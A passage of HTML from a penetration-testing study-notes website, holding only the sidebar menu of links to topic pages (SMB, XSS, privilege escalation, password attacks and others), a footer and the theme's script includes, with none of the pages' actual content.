data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/go-busters/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/go-busters/index.html>Go busters<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/dns/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/dns/index.html>dns<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/smb/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/smb/index.html>smb<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/nfs/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/nfs/index.html>nfs<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/ftp/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/ftp/index.html>ftp<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/smtp/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/smtp/index.html>smtp<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/snmp/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/snmp/index.html>snmp<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/imap-and-pop/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/imap-and-pop/index.html>imap and pop<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/mssql/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/mssql/index.html>mssql<i class="fa-fw fas fa-check read-icon"></i></a></li><li class=active data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/oracle-databases-tns/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/oracle-databases-tns/index.html>oracle databases TNS<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/ipmi/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/ipmi/index.html>IPMI<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/vhosts/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/vhosts/index.html>vhosts<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/web-attacks/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/web-attacks/index.html>Web Attacks<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/xss/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/xss/index.html>XSS<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/login-brute-force-wordlists/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/login-brute-force-wordlists/index.html>login brute force wordlists<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/crackmapexec/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/crackmapexec/index.html>crackmapexec<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/eum4linux/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/eum4linux/index.html>eum4linux<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/rpcclient/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/rpcclient/index.html>rpcclient<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/spwaning-shell/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/spwaning-shell/index.html>spwaning shell<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/file-transfers-windows/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/file-transfers-windows/index.html>File transfers windows<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/file-transfer-using-nc_ncat-and-rdp_winrm/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/file-transfer-using-nc_ncat-and-rdp_winrm/index.html>file transfer using nc_ncat and rdp_winrm<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/living-off-the-land-file-transfer/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/living-off-the-land-file-transfer/index.html>living off the land file transfer<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/transferring-files-with-code/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/transferring-files-with-code/index.html>Transferring Files with Code<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/privilige-escalation/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/privilige-escalation/index.html>privilige escalation<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/linux-privilege-escalation/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/linux-privilege-escalation/index.html>linux privilege escalation<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/windows-privilege-escalation/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/windows-privilege-escalation/index.html>Windows Privilege Escalation<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/pivoting_tunneling/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/pivoting_tunneling/index.html>Scanning the Pivot Target<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/the-active-directory/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/the-active-directory/index.html>The Active Directory<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/the-metasploit-framework/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/the-metasploit-framework/index.html>The Metasploit Framework<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/linux-remote-management/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/linux-remote-management/index.html>Linux Remote Management<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/rdp-and-windows-remote-management/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/rdp-and-windows-remote-management/index.html>RDP and winrm<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/file-transfers-linux/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/file-transfers-linux/index.html>File transfers Linux<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/password-attacks/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/password-attacks/index.html>password attacks<i class="fa-fw fas fa-check read-icon"></i></a></li></ul></li></ul></div><div class="R-sidebarmenu R-shortcutmenu-shortcuts"><ul class="space collapsible-menu"></ul></div><div id=R-footer-margin></div><div class="R-menu-divider default-animation"><hr class=padding></div><div class="R-sidebarmenu R-shortcutmenu-footercontrols"><ul><li class=R-historyclearer><div class="padding menu-control"><i class="fa-fw fas fa-history"></i>
<span>&nbsp;</span><div class=control-style><button>Clear History</button></div><div class=clear></div></div></li></ul></div><div id=R-footer><p>Built with <a href=https://github.com/McShelby/hugo-theme-relearn title=love><i class="fas fa-heart"></i></a> by <a href=https://gohugo.io/>Hugo</a></p></div></div></aside><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/js-yaml/js-yaml.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-color.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-dispatch.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-drag.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-ease.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-interpolate.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-selection.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-timer.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-transition.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/d3/d3-zoom.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/mermaid/mermaid.min.js?1762045611 defer></script><script>window.relearn.themeUseMermaid=JSON.parse("{}")</script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/clipboard/clipboard.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/perfect-scrollbar/perfect-scrollbar.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/theme.min.js?1762045611 defer></script></body></html>